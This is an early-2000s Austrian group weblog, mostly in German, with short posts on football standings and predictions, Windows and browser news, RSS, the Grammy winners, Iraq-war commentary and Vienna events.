    :: bigday  sTe  15.05.2003 11:00:41
    ich melde mich live aus der pyramide vor den toren wiens: microsofts bigday zur promotion vom windows 2003 server und visual studio .net 2003;
    bis jetzt ganz interessant, wenngleich auch viel zu viele teilnehmer bei zu kleiner location;
    wireless lan von metronet funktioniert im gesamten bereich einwandfrei;

    grosszuegig auch die ausgegebenen goodies (rechtsstehend...)
    :: a little history  sTe  14.05.2003 15:04:15
    not to be taken too seriously: The History of The Internet
    :: longhorn  sTe  05.09.2003 14:10:58
    a japanese site has (bravely) posted some screenshots and video footage of the new UI features in Longhorn (next windows version due 2005) and exactly how it behaves. You can see from the screenshots and videos that the windows in longhorn can be stretched, flipped and spun around.
    the fact directX9 can handle this kind of animation and the animation we have seen in technologies like the slideshow on the sidebar is amazing. not sure if we´ll see these kind of windows animation features for the final product but this is a demonstration of just how powerful the animation effects in longhorn will be. (via neowin)

    UPDATED!!!
    What will Longhorn do for you?
    :: long weekend  bully  05.08.2003 20:30:42


    Just saying good-bye for a weekend-trip, visiting some beautiful places:


    + HAFENGEBURTSTAG


    + AOL-ARENA


    + ALSTER


    + GROSSE FREIHEIT 36


    + and many many more...



    have a nice weekend and:

    Good Luck to the Soizbuaga Austria
    on Saturday and Tuesday!!!!!!
    :: robber-knights  sTe  05.08.2003 17:02:04
    auch wenn der herr Verzetnitsch unausstehlich sein mag, so hat sein sager von heute an tschuessel schweren unterhaltungswert: "Sprechen Sie bei einem Überfall auf eine Sparkasse, wo jemand 15 Prozent mitnimmt, von einer Sparkassen-Sicherungsaktion?" ... :)
    :: Der ENDSPURT - more stats  sTe  05.05.2003 15:35:21


    Rueckrundentabelle

    1 Salzburg 14 7 5 2 24:16 26
    2 GAK 14 7 4 3 25:9 25
    3 Austria 14 8 1 5 19:15 25
    4 Sturm 14 6 2 7 21:26 20
    5 Rapid 14 4 6 4 12:14 18
    6 Kärnten 15 5 3 6 18:24 18
    7 Pasching 14 4 4 6 14:14 16
    8 Bregenz 14 4 3 7 23:29 15
    9 Admira 14 3 6 5 11:10 14
    10 Ried 14 4 2 8 16:26 14

    Fruehjahrstabelle:

    1 Salzburg	11	6	4	1	17:8	22 
    2 Austria 11 7 1 3 16:11 22
    3 GAK 11 6 3 2 22:7 21
    4 Kärnten 11 5 2 4 17:17 17
    5 Pasching 11 4 2 5 11:10 14
    6 Admira 11 3 4 4 10:8 13
    7 Sturm 11 4 1 6 16:23 13
    8 Rapid 11 2 5 4 4:10 11
    9 Bregenz 11 3 2 6 14:21 11
    10 Ried 11 2 2 7 8:21 8
    ps: geile stimmung bei fiorenina

    :: networking  sTe  05.05.2003 15:01:54
    dLAN-Produkte sind die homeplug-adapter fuer die datenübertragung über das bestehende 230 V stromnetz im in-house-bereich. mit diesen adaptern wird die vorhandene stromleitung zum internen netzwerk für die datenübertragung. ideal fuers hausinterne netzwerk ohne neue kabel zu ziehen.
    als grenze wirkt angeblich der wohnungs (haus-) stromzaehler, aber wie das wirklich funktioniert muss mir erst wer erklaeren (das mit dem stromzaehler...)
    preislich waers interessant um die 100 €;
    Groundhopping Graz  romario11  05.05.2003 11:04:33
    super sache das letzte groundhopping im schwarzenegger stadion. war es doch sowohl für mich als auch die sally das erste mal, dass wir station in graz liebenau machten.

    voll des lobes kann ich berichten, dass es wohl kaum wo in österreich angenehmer und stressfreier ist, unsere Soizbuaga bei einem auswärtsspiel zu unterstützen: das stadion nicht zu verfehlen direkt an der autobahn abfahrt ost mit parkmöglichkeiten für die, dies wollen. viel besser ist es allerdings in der innenstadt zu parken (reichlich parkplätze) und dann vom grazer hauptplatz aus mit der bim in nur fünf oder sechs stationen bis direkt vors stadion zu fahren.

    vorm und im stadion war die stimmung vollstens entspannt, keinerlei aggressionen spürbar, auch die cops hielten sich im hintergrund und hatten einen angenehmen tag. seltsamerweise schmeckte mir sogar das puntigamer vorzüglich. über die beiden big screens wurden brav die zwischenstände aus den anderen spielen durchgegeben und highlights akkurat in zeitlupe wiederholt.

    über das spiel brauch ich nicht viel schreiben, da wisst ihr eh schon lang bescheid. jedenfalls wars ein verdientes remis, beide seiten hätten aber auch gewinnen können. aufgrund des spielverlaufs v.a. in halbzeit zwei warens für sturm wohl zwei verlorene punkte.

    ich werde sicher bald wieder unsere burschen nach graz begleiten, hoffentlich dann mit ein paar Soizbuagan mehr im gepäck!! ;)))
    :: strike  sTe  05.04.2003 19:40:18
    da im rahmen der gewerkschaftsproteste gegen die von unserer??? regierung geplante pensionsreform die drucker bereits für montag streikmaßnahmen angekuendigt haben, werden die meisten oesterreichischen dienstagszeitungen vermutlich nur im internet zu lesen sein.
    der standard wird dieses ereignis zum anlass nehmen einen vorzeitigen testversuch seines e-papers im zeitungslook zu wagen (link noch nicht aktiv!)
    man sieht auch diese misere hat auch was positives...
    sche woars!  romario11  05.04.2003 19:32:16
    auch wenns täuscht - das koartln stand auch dieses mal wieder eindeutig im vordergrund. und sche woars, obwohl die zeit wieder einmal verflogen is wie nix. mehr als fünf partien warn nicht drin. aber für einige wärs vielleicht eh bald zu teuer gworden (wegen der platzierung, aber auch wegen den kotringen... ;)) ). vielleicht gibts ja schon in rund drei wochen ein regame!
    :: Der ENDSPURT - eine Vorschau:  bully  05.04.2003 18:42:39

    Der momentane Stand der Dinge:

    STP
    2.GAK32+1347
    3.Pasching32+847
    4.Austria Salzburg32-246
    5.Sturm32-946


    wie jeder weiss spielt der zweitplazierte im Sommer zwei Runden Champions League - Qualifikation. Der drittplazierte qualifiziert sich für den UEFA-Cup.

    4 Runden vor Ende der Saison folgt nun hier eine Analyse der Restprogramme sowie eine (beim momentanen Stand sicher gewagte) Prognose.

    Die Restprogramme:

    GAK:
    Sturm (H)
    Ried (A)
    Salzburg (H)
    Kärnten (A)

    PASCHING:
    Kärnten (H)
    Admira (A)
    FAK (H)
    Salzburg (A)

    SALZBURG:
    FAK (H)
    Kärnten (A)
    GAK (A)
    Pasching (H)

    STURM:
    GAK (A)
    Bregenz (H)
    Admira (A)
    Rapid (H)

    Pasching und dem GAK scheint im Endspurt die Luft auszugehen, um Platz 2 ist für mich zur Zeit Sturm der stärkste Konkurrent. Hier nun meine Prognosen:

    Der GAK holt noch sechs Punkte und zwar durch zwei Auswärtssiege.

    Pasching holt maximal noch 2 Punkte durch zwei remis in der Südstadt und gegen den FAK.

    Unsere Salzburger Austria holt noch mindestens 8 Punkte, eher aber 10. Die letzten zwei Runden werden glatt gewonnen. Gegen den FAK und die Kärntner gibts wohl zwei remis, vielleicht aber doch noch einen Sieg zusätzlich.

    Die Vorhersage für Sturm fällt mir sehr schwer, an guten Tagen könnens sicher alle vier Spiele gewinnen, auch wenns ausser im letzten Spiel für alle Gegner noch um sehr viel geht. Meine Prognose: Sturm holt ebenfalls 8 oder 10 Punkte und ist auch am Ende der Saison noch punktegleich mit uns ;-)
    (die Tordifferenz entscheidet für AUSTRIA SALZBURG!)

    Am Ende der Saison sieht´s in der oberen Tabellenhälfte also folgendermassen aus:

    1. FAK ???
    2. Austria Salzburg 56
    3. Sturm 56
    4. GAK 53
    5. Pasching 49

    Abstiegstipp trau ich mir keinen abzugeben, aber vom Gefühl her: sorry, Admira...
    :: always brush your teeth!  sTe  05.02.2003 08:39:38
    :: security  sTe  05.02.2003 06:35:14
    this site demonstrates funny thing
    actual code for that is not more than 7 lines...
    makes me browser wonder even more...

    at least these 2 words on the right you can crush internet explorer :(
    :: explore  sTe  05.01.2003 19:50:29
    unsere heutige entdeckungsreisen zur unterhaltung des nachwuchs fuehrte uns in ein schmuckstueck an gartenkunst: die "berufsschule für gartenbau und floristik" lud zum tag der offenen tuere, und es war den ausflug absolut wert: farbenpracht, kraeuterduft und kakteen aller art...
    :: iPod TNG  utility  05.01.2003 16:39:01
    das wohl einzig wirklich sinnvolle produkt von apple hat jetzt einen geilen nachfolger bekommen...preis/leistungsverhältnis is allerdings noch immer wie bei apple üblich unter aller sau...wurscht, kauft hab ich ihn mir trotzdem (mangels brauchbarer alternativen) ;-)

    p.s.: link wäre auch angebracht...also go here...
    :: out of the ash  sTe  05.01.2003 14:28:23
    vorweg: wer meine vorlieben kennt, mag ueber folgenden artikel eventuell ein wenig irritiert sein:
    als produkt gilt es diesmal den "phoenix", jetzt "firebird" browser vorzustellen, der in absehbarer zeit in die mozilla 1.5 suite eingebunden wird;
    das teil ist unglaublich schlank (in etwa 5-6 mb) und wartet mit einigen auesserst praktischen features auf (Why You Should Switch to the Mozilla Firebird).
    vor allem das tab browsing macht unglaublich spass.
    wirklich interessant wirds, wenn man sich die jetzt schon ziemlich breite palette an extensions anschaut. grade fuer entwickler mächtig.
    ich teste den feuervogel jetzt seit ca einem monat ausgiebigst und muss sagen: really not bad! "all time favourite" internet explorer scheint starke konkurrenz zu bekommen (wurde auch zeit...) und unter linux kann man jetzt endlich auch vernuenftig surfen.
    :: 1st of May  bully  29.04.2003 18:26:20
    am donnerstag, dem tag der arbeit, gibt´s auf der rock gegen rechts - bühne im prater gratiskonzerte von my balloon und die happy.
    zeiten sind mir leider auch nicht bekannt, aber ebendort im laufe des tages sicher zu erfahren...
    :: gratulation...  bully  27.04.2003 18:46:06
    ... und neidlose anerkennung an die neuen fussballmeister in österreich und deutschland.
    haben´s leider beide vollkommen verdient...

    :: counter  sTe  26.04.2003 00:37:33
    a big thanks to the techtalk crew fuer das counterstrike revival!!!
    meine performance kann man schmeichelhaft als eingerostet bezeichnen; aber rust never sleeps...!!! "mamamia" war hingegen ungebrochen stark :)
    :: nice googlogo  sTe  25.04.2003 17:25:09
    ...today @ google
    :: tele  sTe  24.04.2003 17:33:54
    da ich im vorangegangenen artikel den orf noch geruegt habe, so muss man ihm fuer das teletext service wieder ein lob aussprechen.
    praktisch wenn man grad keine tv-karte eingesteckt hat...
    :: RSS  sTe  24.04.2003 11:00:12
    seit einiger zeit taucht vorrangig bei news sites ein begriff im web immer haeufiger auf: RSS ;
    hierbei handelt es sich kurz gesagt um ein spezielles austausch format von informationen in der beschreibungssprache XML auf einfachstem niveau;
    RSS steht fuer:
  • Rich Site Summary

  • Really Simple Syndication

  • RDF Site Summary

  • Rich Site Syndication

  • Rich Syndication Standard

  • wobei der erste ausdruck sich durchzusetzen scheint.
    der wichtigste verbreitungsgrund von RSS sind jedoch die
    weblogs, die als erstes auf den zug aufgesprungen sind, weil
    auch die firma Userland massgeblich bei der entwicklung des
    standards beteiligt war.
    man findet kaum ein weblog mehr das keinen RSS-Feed hat, so auch feelosophee (obwohl ich ihn mehr zu testzwecken implementiert habe);
    gekennzeichnet wird er meist durch einen button , und schaut folgendermassen aus: feelofeed

    einen solchen feed kann man nun auf verschiedenste arten darstellen, sharen und in andere applikationen einbinden (newsreader, trillian, klipfolio... eine liste findet sich hier )

    dass man die information damit auch uebertreiben kann demonstriert wieder mal orf.on mit seiner uebersichts-seite auf der gleich 8!!! RSS-feeds dargestellt werden.
    die sinnhaftigkeit solcher informationsflut sei dahingestellt...

    PS: witzig finde ich eigentlich dass RSS in seiner einfachheit
    die bisher erfolgreichste XML anwendung zu sein scheint...
    :: Wachauer Impression vom 17.04.03  romario11  21.04.2003 15:01:44
    Und da sag noch einer, in unseren Breiten gäbe es keinen romantischen Sonnenuntergang! ;))
    :: Bildungsauftrag – Einwohnerzahlen der Staaten dieser Welt   bully  20.04.2003 20:46:42
    Dass China vor Indien in Bezug auf die Bevölkerungsanzahl führt, weiß man. Aber wie geht’s dahinter weiter???
    Da mich dies interessiert hat, hab ich ein wenig recherchiert und stelle hier nun allen feelo-Lesern die Reihenfolge der 50 bevölkerungsreichsten Staaten der Welt zur Verfügung:

    01China1.220.800.000
    02Indien946.000.000
    03USA265.000.000
    04Indonesien196.000.000
    05Brasilien159.150.000
    06Rußland149.000.000
    07Pakistan135.000.000
    08Japan126.000.000
    09Bangladesh121.000.000
    10Nigeria114.900.000
    11Mexiko93.400.000
    12Deutschland81.880.000
    13Vietnam75.500.000
    14Philippinen72.000.000
    15Iran65.800.000
    16Ägypten63.500.000
    17Türkei63.000.000
    18Thailand60.000.000
    19Großbritannien58.700.000
    20Frankreich58.300.000
    21Italien57.400.000
    22Äthiopien55.900.000
    23Ukraine52.000.000
    24Kongo45.800.000
    25Myanmar45.600.000
    26Süd-Korea45.570.000
    27Südafrika42.000.000
    28Spanien39.600.000
    29Polen38.400.000
    30Kolumbien37.350.000
    31Argentinien35.000.000
    32Tansania30.500.000
    33Kanada30.000.000
    34Kenia29.000.000
    35Algerien28.500.000
    36Sudan27.600.000
    37Marokko27.100.000
    38Peru24.400.000
    39Afghanistan23.700.000
    40Usbekistan23.380.000
    41Rumänien22.800.000
    42Venezuela22.400.000
    43Nord-Korea22.400.000
    44Nepal22.100.000
    45Taiwan21.500.000
    46Irak21.400.000
    47Malaysia20.500.000
    48Saudi-Arabien20.000.000
    49Uganda19.700.000
    50Sri Lanka18.400.000

    :: tickle  sTe  18.04.2003 11:33:40
    Some clever Dutch people have built a little robot that wanders round on your back, creating a "pleasant, tickling sensation."
    check out the video...
    :: für manche depressing, für manche nicht...  bully  16.04.2003 18:41:54
    Wie alt sind Sie wirklich?

    :: zugabe:
    dann halt gleich nochwas:
    deine lebenserwartung
    ps: ohne tschick hätt er mir gleich 9 (!!!) jahre mehr gegeben...
    :: Slainte!  sTe  15.04.2003 16:27:56
    zwei tage lang dreht sich bei der 1. Wiener Whisky Messe alles um das flüssige gold: zur veranstaltung am 26. und 27. April im Arcotel Wimberger (Neubaugürtel 34-35) haben sich namhafte Unternehmen aus der branche angekündigt. eine breite auswahl unterschiedlicher Whiskys und informationen ueber geschichte und herstellung dieses edeldestillats werden angeboten.
    fuer musikalische untermalung sorgen die Schottin Deidre Campbell-Shaw mit ihrer keltischen harfe und sowie die Samh Dubh-Pipe Band mit ihren dudelsäcken. kabarettist Karl Pfeifer liest am samstag um 19.00 Uhr schottische whiskygeschichten, am sonntag präsentiert regisseur Kurt Palm aus seinem neuen buch über James Joyce das Kapitel "Der Rausch".
    1. Wiener Whisky Messe,
    26. April von 14.00 bis 22.00 Uhr,
    27. April von 10.00 bis 18.00 Uhr;
    Eintritt: €18,-
    :: neulich im 7.bezirk  sTe  13.04.2003 11:53:50
    :: armes österreich!!!  bully  04.12.2003 21:55:59
    wenn man sich die heutige fussball-berichterstattung anschaut, gibt es in österreich wohl nur noch einen einzigen sportredakteur, und der darf weder gratis ins stadion noch kann er sich ein ticket leisten...
    (die partie rapid - salzburg KANN der nicht gesehen haben!)

    armes österreich!!!

    hier zum vergleich:
    sport.orf.at:


    kurier:


    sport1.at:


    exakt das gleiche steht unter anderem auch im standard und auf bundesliga.at.

    ich find das echt unfassbar!!! in all den österreichischen online sport-medien steht der selbe schwachsinn von wegen "zwar hatten die hausherren über die komplette matchdauer mehr vom spiel...". darauf, dass dieser besagte einzige sportredakteur, der über dieses spiel berichtet, 9 chancen für rapid gesehen hat, möchte ich hier beim besten willen nicht eingehen; darüber kann ich nur verwundert den kopf schütteln...

    aber das kann mir die freude am heutigen hoooochverdienten sieg nicht einmal ein bisschen vermiesen, hahahaaaa!!!
    SIEG!!! SIEG!!! SIEG!!! SIEG!!! SIEG!!! SIEG!!! SIEG!!!
    :: hidden  sTe  04.09.2003 09:54:41
    after starring at the FedEx logo for a few seconds, you should see an arrow hidden between the letters E and X. very subtle perception, I must admit...
    :: CUPFINALE  bully  04.08.2003 20:30:15
    wegen des bon jovi - konzerts wird das cup-finale (1.6.) heuer nicht im happel-stadion stattfinden.
    :-((((((
    finalstadion ist entweder das schwarzenegger-stadion in graz oder das hanappi-stadion in wien-hütteldorf (abhängig von der paarung)

    wieder mal super geplant, öfb und stadionbetreiber!!!


    :: UPDATE:

    Das Cupfinale findet am 1.6. um 16.30 uhr im Hanappistadion statt!!!
    :: ancient spam  sTe  04.08.2003 11:12:16

    by the way, if you´re using outlook try cloudmark
    :: world press photo  sTe  04.08.2003 11:00:01
    die gewinner 2002 gibts hier
    :: strange  sTe  04.08.2003 10:03:17
    just realized that you can´t create (on a windows box) a folder named ´aux´ ?!?
    :: gefahr?  sTe  04.07.2003 21:11:12
    welche gefahren alle beim virtuellen amt lauern, wusste ich gar nicht...
    :: matrix  sTe  04.07.2003 14:21:16
    new short trailer
    :: how to...  sTe  04.07.2003 11:28:35
    ...make a starship enterprise out of an old floppy disk

    updated!!!
    Papercraft corner - printable cutesy paper folding patterns;
    you can apparently make your own with this windows app.
    and please, be careful while using an edged tool.
    :: bookship  sTe  04.07.2003 10:12:23
    Wien hat eine neue - architektonisch beeindruckende - Hauptbibliothek. Öffnungszeiten: Arbeitstags von 11:00 - 19:00 Uhr, samstags von 10:00 - 14:00 Uhr. Das ist ausgesprochen kundenunfreundlich - so der Österreichische Gewerbeverein (ÖGV).

    Gerade jene, die arbeiten, haben ja nicht gerade die Muße, abends bis 19:00 Uhr in die Volksbibliothek zu hetzen, um dort zu schmökern. Aber darum geht´s ja wohl nicht - die Volksbibliothekare brauchen Zeit, um sich von ihrem anstrengenden Beruf ja möglichst lange schonend fernzuhalten. Da können schon einmal Kundenbedürfnisse auf der Strecke bleiben. Dafür hat das am Dach der Hauptbibliothek befindliche Restaurant Canetti täglich von 9:00 - 24:00 Uhr geöffnet. Grund: Es wird von Privaten betrieben...
    ...Man kann sich des Eindrucks nicht erwehren, dass in diesem Land das wichtigste der Beamten ist, nur ja recht schnell von der Arbeit befreit zu sein und nur ja möglichst spät mit ihr zu beginnen - und die Chefs decken diese mangelnde Kundenorientierung sogar noch, weil sie selbst keine haben!
    :: superb navigation  sTe  04.04.2003 10:29:56
    www.playmore.com
    :: FIGHT THE GIS!!!  sTe  04.02.2003 14:39:39
    G ebühren
    I nkasso
    S ervice
    :: hello world  sTe  04.02.2003 12:23:26
    this sounds more than interesting:
    HelloWorld provides a fresh, visual approach to connecting people, online messaging, search and transfer operations, and personal publishing, in a decentralized network environment that is owned and operated by the network community.
    screenshots here;
    its still a Developers Release and lacks quite a bit, but even as much as it has now it could be something (dare I say) revolutionary and (dare I say again) groundbreaking...
    :: rearranged 2003  sTe  30.03.2003 12:06:34
    thats how it looks now
    :: VORFREUDE!!!!!  bully  30.03.2003 01:11:13
    Mr. James Osterberg, aka Iggy Pop, war die letzten zwei Monate schwer beschäftigt.
    Am Montag übergibt er Virgin das Material für seine neue CD; es wird dies nun die letzte für Virgin sein, da der Vertrag endlich ausläuft.
    Auf diesem Album wird es zu einigen sehr erfreulichen Kooperationen kommen; so werden z.B. Scott und Ron Ashton (The Stooges) auf zwei Liedern vertreten sein.
    Eine Reunion-Tour ist jedoch nicht geplant...
    Iggy:“It’s not the Stooges, but a little something new...“ ;-)
    Des weiteren wird der Godfather of Punk auch ein Lied mit seinen Enkeln von Green Day präsentieren. Man kann also schon seeeehr gespannt sein. Ich jedenfalls erwart mir da schon einiges!!!
    Release Date gibt es noch keines, es soll wohl Ende Mai, Anfang Juni so weit sein.

    3.v.l.: Iggy Pop, der Rest: Green Day ;-)
    :: embedded journalist  sTe  28.03.2003 13:04:09
    :: informations (war) design  sTe  24.03.2003 11:13:01
    immer mehr nachrichtendienste nutzen interaktive karten: ein auszug:

  • SPIEGEL online
  • CNN
  • Washington Post
  • BBC
  • Wide Angle
  • :: spring´s here...  sTe  23.03.2003 19:11:12

    aufgenommen heute im Josef-Strauss Park...
    :: gulf war 2 (aka world war 2.5)  utility  19.03.2003 17:15:18
    "This is a projection of the most likely outcome of a new war in the Gulf. I used sophisticated temporal algorithms and historical semiotic analysis to achieve an accuracy rating of 99.999%. It´s the mother of all Flash games."
    click here...


    genial!!! - danke an christoph für den tipp :-)
    :: na bravo...  bully  19.03.2003 08:11:17
    ... george w., jetzt haben dir die türken also doch wenigstens die überflug-genehmigung gegeben...
    da simma aber froh, ha?

    dass du ihnen dafür das recht einräumst in die nordirakischen kurdengebiete einzumaschieren, ist doch eh klar...
    hätt mich auch gewundert, wenn von dir und der restlichen us-administration auch nur ein bisschen über den eigenen tellerrand geschaut worden wär ...

    hier heiligt der zweck wohl echt ALLE mittel, mir kommts kotzen!!!!!

    ps: noch vor 11 tagen hiess es:
    Kurds Will Not be Betrayed Again
    :: quite interesting...  bully  16.03.2003 19:28:45
    volxzählung
    :: nofroweb 2003  sTe  13.03.2003 18:39:29
    its new, its fresh, its online...
    nofrontiere space
    :: cool tool  sTe  03.12.2003 14:56:24
    der heimische Uhrenhersteller LAKS hat Zeitmessung mit nützlicher Technologie gepaart und aus einer Uhr eine Festplatte für das Handgelenk fabriziert.
    Preise zw. 42 (32 MB) und 93 Euro (128 MB), (überraschend günstig)

    Technische Daten:
    • Unterstützt USB 1.0/1.1,
    • Speicherkapazität bis zu 128 MB
    • Sicherheit durch Speicherchip von Toshiba
    • Datentransfer 1000 KB/sec lesen, 920 KB/sec schreiben
    • LED Status Indicator
    • Passwortschutz
    • USB bus-powered
    • Zubehör: USB Verlängerungskabel,
    • waterresistant
    • Uhrwerk Citizen
    • Lebensdauer der Batterie 3 Jahre
    • 2 Jahre Garantie
    :: nur mal zur aufklärung...  bully  03.09.2003 23:18:48
    zur zeit wird ständig gemutmasst, ob die usa im
    un-sicherheitsrat eine mehrheit für den krieg gegen den irak bekommen werden. die zib berichtete heute, dass die usa sicherheitsrat-mitgliedern finanzielle hilfe für eine zustimmung versprechen. deshalb erlaube ich mir hier jetzt einmal die zusammensetzung dieses gremiums zu erläutern:

    der sicherheitsrat hat 15 mitglieder; es gibt fünf ständige mitglieder, die alle ein vetorecht haben und zehn weitere, die auf jeweils zwei jahre von der generalversammlung gewählt werden.

    die ständigen mitglieder:
    CHINA
    FRANKREICH
    RUSSLAND
    UNITED KINGDOM
    UNITED STATES OF AMERICA


    die (momentanen) nichtständigen mitglieder:
    ANGOLA
    BULGARIEN
    CHILE
    DEUTSCHLAND
    GUINEA
    KAMERUN
    MEXIKO
    PAKISTAN
    SPANIEN
    SYRIEN
    wo ist die weltbedrohungs-umfrage hin??  romario11  03.07.2003 15:29:48
    wer war da als zensus am werk? muss das sein?
    :: callcenter and friendliness  sTe  04.06.2003 00:15:17
    feelosophee.com wurde soeben bis 2012 gesichert; und das auf telefonischem wege;
    ansich keine grosse sache eigentlich; waere die betreffende stelle nicht in amerika sondern in österreich gewesen; gottlob war dem nicht so!!!
    was einem da an freundlichkeit, kompetenz und lockerheit entgegenschwappt war fast schon erdrueckend; musste selber mitlachen...; allein die tatsache sofort mit dem vornamen angesprochen zu werden (was jetzt nur die stimmung wiederspiegeln soll, jedoch keine wertigkeit beinhaltet), und das absolute commitment jeglichsten wunsch bestmoeglich zu erfuellen;
    die ami-gans schnatterte in perfektem kundenservice ihre sprueche runter, freundlichst und lustig auf smalltalk und trotzdem kompetent;
    nach all den vielzaehligen letzten österreichischen callcenter calls (worst case upc-telekabel) eine wohltat und gleichzeitig eine erschreckende vergleichsstudie!!!
    FAZIT: "kunde ist koenig" ist keine amerikanische erfindung; aber sie wenden es wenigstens vorzueglich an; bei uns haben es die meisten vergessen oder nie kapiert !!!
    :: TV-Tipp:  bully  03.05.2003 17:07:09
    Do, 6.3. 2003, 21.45 Uhr, ARD:
    PANORAMA
    Frisierte Berichte, gefälschte Beweise -
    Wie Bush für den Krieg mobilisiert
    :: unglück im glück :-))   bully  03.05.2003 13:27:23

    take a look
    :: disk space  sTe  03.03.2003 10:07:31

    how much is enough? some people think you can never have too much disk space for stuff. this guy has attached all 1.8T worth of drives...
    @ bully weiter unten: mein team!  romario11  03.02.2003 22:53:08
    we gonna kick your ass big time baby!!
    :: music brainz  sTe  03.02.2003 19:14:44
    feelosophee testet gerade ein neues interessantes projekt namens MusicBrainz;
    hierbei werden mp3s anhand bestimmten taktfolgen oder -längen identifiziert und die metadaten (ID3) dann mit einer datenbank im internet abgelichen.
    die ersten test verlaufen vielversprechend wobei ca die haelfte der lieder erkannt werden, was in zukunft, wenn die datenbank waechst sicher mehr wird...
    :: sad day farewell isonews (almost)  sTe  03.02.2003 18:48:27
    fast waere wieder eine der wohl wichtigsten sites (isonews) geschlossen worden; (warum und wieso steht uebrigens auf diesem link)
    doch isonews laeuft neu und trotzig unter der neuen adresse: stolemy.com munter weiter,...uff
    :: OLYMPIA 2010  romario11  03.02.2003 13:12:22


    zur aufklärung etwaiger missverständnisse (mich eingeschlossen):
    die bewerbung für die winterspiele wird von südkorea alleine betrieben, und zwar von der region PyeongChang. die hat mit der hauptstadt von nordkorea P´yongyang nix zu tun.

    also: aufpassen auf die südkoreaner - die olympia hamma no ned im sack!
    :: COOLE SPOTS & MEHR  bully  04.01.2003 01:01:45

    sehr gut gefallen mir die neuen nike spots (die mit dem strichmanderl)!



    die spots zum download, viele gimmicks und auch ein spiel (schwierig!!!) gibts HIER

    des weiteren empfehle ich die anmeldung zum MAGIA GAME
    starting march 13th...

    mein team:
    :: CD-Tipp  bully  03.01.2003 13:02:34
    Eine unglaubliche Steigerung, auch wenn ihre letzte CD schon sehr gut war, haben Hed Planet Earth aka (hed) PE vollbracht. Ihr neues Album "Blackout" (ab 18. März im Handel) ist einfach nur genial!!!
    Sänger Jahred beschreibt es als "Less rap and more metal". Aber auch für Liebhaber eher ruhigerer Musik ist ein grandioses Machwerk (Other Side) dabei.
    Zur Zeit sind sie noch auf der Jägermeister Tour in den USA engagiert, für den Herbst ist aber eine Europa-Tournee geplant!
    Wer schon mal vorab in die neue CD reinhören will, kann das am besten hier.
    ABSOLUTE KAUFEMPFEHLUNG!!!
    :: ground zero - the winner is...  bully  27.02.2003 15:12:17


    ... das Projekt der Gardens of the World vom Studio Libeskind (530 Meter hoch).

    Dass mir persönlich das unterlegene Projekt besser gefallen hätte, hab ich ja schon weiter unten berichtet, aber bitte...

    lassma uns überraschen...
    :: 45th Annual GRAMMY Awards  bully  23.02.2003 21:31:30
    Heute Nacht (live auf Premiere1 ab 1.45 Uhr) werden im New Yorker Madison Square Garden die begehrtesten Preise der Musikindustrie verliehen. It´s Grammy Night!!!
    Um die zwei Milliarden Zuschauer in 180 Ländern werden live dabei sein. In unglaublichen 104 verschiedenen Kategorien von Pop, Metal, Blues, Rap, über Klassik bis hin zu Polka werden die Goldenen Trophäen vergeben. Als Favoriten mit jeweils fünf Nominierungen gelten dieses Jahr die Rapper Eminem und Nelly, die Jazzrock-Sängerin Norah Jones, Nachwuchssängerin Avril Lavigne, sowie Sheryl Crow und R&B-Star Ashanti. Hier auf alle 104 Kategorien einzugehen ist logischerweise sinnlos, deshalb werde ich nur kurz die für mich wichtigsten Kategorien mit den Nominierten und meinen Favoriten vorstellen.
    Here we go:

    Record of the Year
  • A Thousand Miles - Vanessa Carlton
  • Without Me - Eminem
  • Don´t Know Why - Norah Jones
  • Dilemma - Nelly featuring Kelly Rowland
  • How You Remind Me - Nickelback

  • My Fav: Without Me - Eminem

    The Winner is: Don´t Know Why - Norah Jones

    Album of the Year
  • Home - Dixie Chicks
  • The Eminem Show - Eminem
  • Come Away With Me - Norah Jones
  • Nellyville - Nelly
  • The Rising - Bruce Springsteen

  • My Fav: The Eminem Show – Eminem

    The Winner is: Come Away With Me - Norah Jones

    Song of the Year

  • Complicated - Avril Lavigne
  • Don´t Know Why - Norah Jones
  • The Rising - Bruce Springsteen
  • A Thousand Miles - Vanessa Carlton
  • Where Were You - Alan Jackson

  • My Fav: egal...

    The Winner is: Don´t Know Why - Norah Jones

    Best Pop Performance By A Duo Or Group

  • Everyday - Bon Jovi
  • Girl All The Bad Guys Want - Bowling For Soup
  • Where Are You Going - Dave Matthews Band
  • Hey Baby - No Doubt
  • Girlfriend - NSYNC

  • My Fav: Girl All The Bad Guys Want - Bowling For Soup

    The Winner is: Hey Baby - No Doubt

    Best Rock Performance By A Duo Or Group
  • Girls Of Summer - Aerosmith
  • In My Place - Coldplay
  • My Sacrifice - Creed
  • Hero - Chad Kroeger featuring Josey Scott
  • When I´m Gone - 3 Doors Down
  • Take Me As I Am - Tonic
  • Walk On - U2

  • My Fav: Walk On - U2
    The Winner is: In My Place - Coldplay

    Best Hard Rock Performance

  • All My Life - Foo Fighters
  • I Stand Alone - Godsmack
  • Youth Of The Nation - P.O.D.
  • No One Knows - Queens Of The Stone Age
  • Aerials - System Of A Down

  • My Fav: No One Knows - QOTSA (sehr schwer gefallen)

    The Winner is: All My Life - Foo Fighters

    Best Metal Performance

  • Here To Stay - Korn
  • Portrait - P.O.D.
  • My Plague - Slipknot
  • Get Inside - Stone Sour
  • Never Gonna Stop - Rob Zombie

  • My Fav: Get Inside - Stone Sour
    The Winner is: Here To Stay - Korn

    Best Rock Song
  • All My Life - Foo Fighters
  • Hero - Chad Kroeger featuring Josey Scott
  • I Stand Alone - Godsmack
  • The Rising - Bruce Springsteen
  • When I´m Gone - 3 Doors Down

  • My Fav: I Stand Alone - Godsmack
    The Winner is: The Rising - Bruce Springsteen

    weitere Preisträger:

    Best Short Form Music Video
    Without Me - Eminem

    Best Long Form Music Video
    Westway To The World - The Clash

    Best New Artist
    Norah Jones


    Diese kleine Norah Jones hat ja ordentlich abgeräumt, muss ich schon sagen...
    Sehr beeindruckend war aber vor allem der Abschluss des Abends; Little Steven (E-Street Band), Dave Grohl (Foo Fighters), Bruce Springsteen, Elvis Costello, Pete Thomas (Attraction) und Tony Kanal (No Doubt) präsentierten als Tribute to Joe Strummer LONDON CALLING:

    :: 49 impressing seconds...  bully  23.02.2003 04:59:30

    In nur 49 Sekunden wirbelte Mike Tyson heute Nacht in der Pyramid Arena in Memphis, Tennessee, zum 50. Sieg (45 KOs) seiner Profikarriere (4 Losses und 2 NCs).
    Sein Gegner: Clifford Etienne
    Dessen Statistik sieht jetzt folgendermassen aus:
    24 Siege (17 KOs), ein Remis, zwei Losses
